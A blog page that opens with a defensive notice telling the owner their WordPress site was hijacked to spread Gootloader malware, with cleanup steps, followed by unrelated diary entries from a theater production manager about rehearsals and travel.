wilnap

Dear blog owner and visitors,

This blog had been infected to serve up Gootloader malware to Google search victims, via a common tactic known as SEO (Search Engine Optimization) poisioning. Your blog was serving up 380 malicious pages. Your blogged served up malware to 19 visitors.

I tried my best to clean up the infection, but I would do the following:

• Upgrade WordPress to the latest version (one way the attackers might have gained access to your server)
• Upgrade all WordPress themes to the latest versions (another way the attackers might have gained access to your server)
• Upgrade all WordPress plugins (another way the attackers might have gained access to your server), and remove any unnecessary plugins.
• Verify all users are valid (in case the attackers left a backup account, to get back in)
• Change all passwords (for WordPress accounts, FTP, SSH, database, etc.) and keys. This is probably how the attackers got in, as they are known to brute force weak passwords
• Run antivirus scans on your server
• Block these IPs (5.8.18.7 and 89.238.176.151), either in your firewall, .htaccess file, or in your /etc/hosts file, as these are the attackers command and control servers, which send malicious commands for your blog to execute
• Check cronjobs (both server and WordPress), aka scheduled tasks. This is a common method that an attacker will use to get back in. If you are not sure, what this is, Google it
• Consider wiping the server completly, as you do not know how deep the infection is. If you decide not to, I recommend installing some security plugins for WordPress, to try and scan for any remaining malicious files. Integrity Checker, WordPress Core Integrity Checker, Sucuri Security,
  and Wordfence Security, all do some level of detection, but not 100% guaranteed
• Go through the process for Google to recrawl your site, to remove the malcious links (to see what malicious pages there were, Go to Google and search site:your_site.com agreement)
• Check subdomains, to see if they were infected as well
• Check file permissions

Gootloader (previously Gootkit) malware has been around since 2014, and is used to initally infect a system, and then sell that access off to other attackers, who then usually deploy additional malware, to include ransomware and banking trojans. By cleaning up your blog, it will make a dent in how they infect victims. PLEASE try to keep it up-to-date and secure, so this does not happen again.

Sincerly,

The Internet Janitor

Below are some links to research/further explaination on Gootloader:

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/

https://www.richinfante.com/2020/04/12/reverse-engineering-dolly-wordpress-malware

https://blog.sucuri.net/2018/12/clever-seo-spam-injection.html

This message

Jane and worked at home today. And then we went on a date to Alamo Drafthouse. There is a series there that shows older movies. We saw Domino by Tony Scott. Crazy, both a knock off of Tarantinoesque style and a forerunner of hyper American gun movie.

Or first try.

We were to load in the flying system from Chicago Flyhouse into NYLA. But the truck didn’t show up. So we sent everyone home and sort of had a long talk with Alice. And went home and got a bit more rest.

of 20. Today the artists were in a bit better shape. Alice, upon realizing that we only have two more days left and that they will have to be spent mostly organizing the showing, said “my mind and heart totally want this to keep going but my body could quit right now.

We only worked until 4pm today. To get a little bit of rest. It might have been better to take that time in the morning but Alice had to go off to a meeting at 3:30pm.

I got some calls in to the Triptych venues for the fall. And inserted the updates from the team into the rider.

Also I updated my Vectorworks license until September 2021. US$1500+. Did I ever mention that I hate that program?

For the first day in this three week process I didn’t show up at 10am call. I went to Gelsey Kirkland studios to check out the suitability for doing a rehearsal residency for Kinetic Light. The rear studio, no. 1, owuld be the best. There are several I-Beams up there that we could rig from. Power might be a bit of a problem as the Chicago Flyhouse system require 3 phase. But probably doable.

I left the house kind of late after speaking with Suzanne at Durham performing arts. Looks like I’m going to be the local production manager for their presentation of ABT’s Giselle next March.

Then the rest of the day I was at rehearsal. Alice and Laurel were pretty trashed. I think that we’ve come up against a a wall in the process. There is a good sketch of all the sections that there are going to work on here. But there isn’t much more to do to get the work polished. There just isn’t enough time given that we have to do a showing on Saturday.

We did fun game of “telephone” where we first passed small phrases from one to another. And then did small dance phrases that we did the same with. Transforming them with every passing from person to person.

Day 16 straight of rehearsals for Wired. I woke up pretty early. Around 6am. Did some light exercise. I had a last Kneckerbrot cracker with some peanut butter. On the way into NYLA I got a Blue Spirulina smoothy. Nice. Also a bottle of green juice for lunch which I ate with the second half of a wrap from the deli. We got out around 5:30pm. Mark and Janet both made it in. On the way home I was really starving so I stopped and ate at an old style NY Chinese place. Orange chicken. Not bad but it was a lot of meet. Now I’m quite full. The water still tastes a little weird at the house. Almost like there is lemon added to it or something. I through away our old Brita (it was really banged up) because I thought it was causing the taste. But with the new Brita it’s the same thing. I’m going to go check it straight from the tap.

I’ve departed from Brooklyn to Hong Kong. My intention is to find scene shops in China to build sets for the US and Euro market. I bought a ticket on NW for about $800. I really have to get my frequent flyer thing going because I’ve lost so many flights by ignoring the whole thing over the years. The flight turned out to be a code share with Delta. Jane says that they have merged. We first flew to Tokyo. That was about a 14 hour flight. It’s really a bear to sit still for that amount of time. you can get a full night’s sleep and still have 6 hours to kill. I saw a couple of movies. I tried to watch Ice Age 2 (or whatever number their up to) but didn’t last very long. Then I watched a Will Ferrel movie with Dinosaurs. I wasn’t good, but it was exactly what you’d expect. The I watched some movie with a bunch of explosions. I can’t remember what. You can actually feel your internal clock being fucked with as you fly. We took off at about 12 noon and flew in a straight line to Tokyo which on the globe goes almost to the arctic circle. It starts to get dark around 3pm (home time) then the sun comes back up again at around 9pm, It was dark again by the time we landed which was 4am(ish) at home and 4pm in Tokyo.  In Tokyo I had a fairly short layover. I sat right in front of the gate in case I fell asleep. The flight from Tokyo to HK is about 5 hours. I think I watched another movie on that one but obviously it was unmemorable. When we landed I had no problem with immigration. I took the MTR train into Hong Kong Central for about US$12 and then a cab to the hotel for about the same. My online reservation was honored without question (whew) and they upgraded me to the business club floor. The room was not non-smoking (the unavailability of non smoking rooms the ostensible reason for the upgrade) but it wasn’t too stinky and by the next day it had aired out. The room was a pretty standard business hotel kind of room except that it had a very small kitchenette with a deep kitchen sink (with a cutting board kind of cover) two burner stove a microwave, hot water boiler and a large refrigerator. All crammed into a not overly large entry hallway. Across the street was a 7-11 open late. I was able to score a couple of beer and some munchies. I sat and checked out the TV and the chilled. It took a while for me to get to sleep and by that time I had drunk quite a bit of beer. The next morning I woke up pretty early. I felt like crap. They are right, one definitely shouldn’t drink in any significant quantity on a super huge flight. It was like low grade hangover with fluish symptoms. I have to avoid that in the future. Especially since that night i went to see a performance on CCdC and afterwards went out and drank with Anther. We went to a bar near the CCdC studios. There they brought beer buckets of something called Blue Girl. It was very very light, just like I like beer but with an alcahol content of 5%. The bottle had a kind of Bavarian theme. There were several waitresses who contstantly circulated and kept our glasses from getting empty. We must have drunk about 6  beers each. It was Anther’s birthday, but the people at the bar (who were obviously very close to him) didn’t know it. After the bar made a big to do about another patron’s birthday I mentioned to the manager that it was Anther’s birthday as well. After that they moved us to a better table and then all the waitresses came by and sat with us for a while. We played a fun dice game that Anther says is played all over China. There are 5 die in a cup. You shake the cup, put it upside down on the table then take a look at your roll.

I wrote on my Facebook page today that I am in Bogota, Colombia “Checkin’ out some theaters”. Well, that’s about as good as I could have imagined for my life at one point.I remember Glen Rumsey (you may know her as Shasta Cola) describing how he knew it was time for him to leave the Merce Cunningham Company. They were performing in L’Opera de Paris Palais Garnier, one of the greatest venues any performer can aspire to play in, he was in his dressing room putting on his make up and he was miserable, totally miserable. As he sat there, staring at himself feeling so bad and wondering how this could be at such a pinnacle of success he knew it was time to move on.Late last night I wrote on my Facebook page that I was in Bogota Colombia “Checkin’ out some theaters”. I suppose I only did so to impress my friends, why else write anything there? But I guess that I’m not all that impressed with myself in the end. It’s just what I do? Am I miserable? Nope, not like Glen was, I have been like that in the past and I’m nowhere near that yet. But I am at that point where I’ve got to move into new challenges. I want to do things that do impress me.I’ve got to build some sets in China.I’m having some really stupid delays. I decided to find a graphic artist online. I found one whose work I like but prepress stuff have really stumped us.I also have taken on a lot of work that needed to get done. Pretty cool work, but work that doesn’t really impress me, even if the money has been better than I’ve usually gotten paid. I need to get this done.I’m sitting here with Maria Rita Stumpf in the lobby of the in the hotel in Bogota. We visited a theater today. I walked around the stage and pronounced it “OK” with two thumbs up. We’ve been traveling together for three days. We get along well but we’ve gotten to the point we haven’t much left to say to each other.We have a 6 hour overnight flight to New York and then I go right into meetings all day. I guess that’s the best thing just to keep me going. Then Jane and I are going to see the Donna Uchizono piece.

It was a fairly easy day here in Portland.

Prehang wasn’t finished so it took much longer to get focusing than it should have. But Leo did have about an hour before lunch. He wasn’t finished by dinner, however, and we were started tech at around 8:06.

The crew was fine. Good guys. The house carpenter was with us in the Schnitzer when I was there with Cunningham. He really sorted out our problems and we gave him a bottle of wine on the way out.

Tei had a rough night from food poisoning. None of the rest of us who ate oysters were in trouble so he figured it was from a vietnamese sandwich he had from lunch.

We went out to get a cup of coffee found a great guy running “Cafe Velo” a bicycle driven cafe cart. He had two large pots boiling water behind him and a rack of drip set ups on the cart. You could chose your coffee and he would drip it fresh. Mine was goooood.

The cafe velo was in in the green market that appears downtown. Leo and I had lunch there. We both had tomales. Not bad but not spectacular. Only $5.

Hilary stopped by in the afternoon and I showed her around the theater, everything from spike marks to the fly system to how the lighting computer works.

We went to dinner at Indonesian Place. I had fried rice.

Rehearsal went very well. But we kind of fucked up the spacing for “Place” and Ana was quite upset, but she usually is.

Hilary came and watched the rehearsal as well. I think she had a good time.

I walked around Portland and tried to find a bar. I was able to get a beer at a place called lotus. But they closed at midnight. So I bought some beers at a deli and came home. They had a publication called “Busted” a round up of police blotter info from around the area. Something I’m sure that noone wants that kind of press.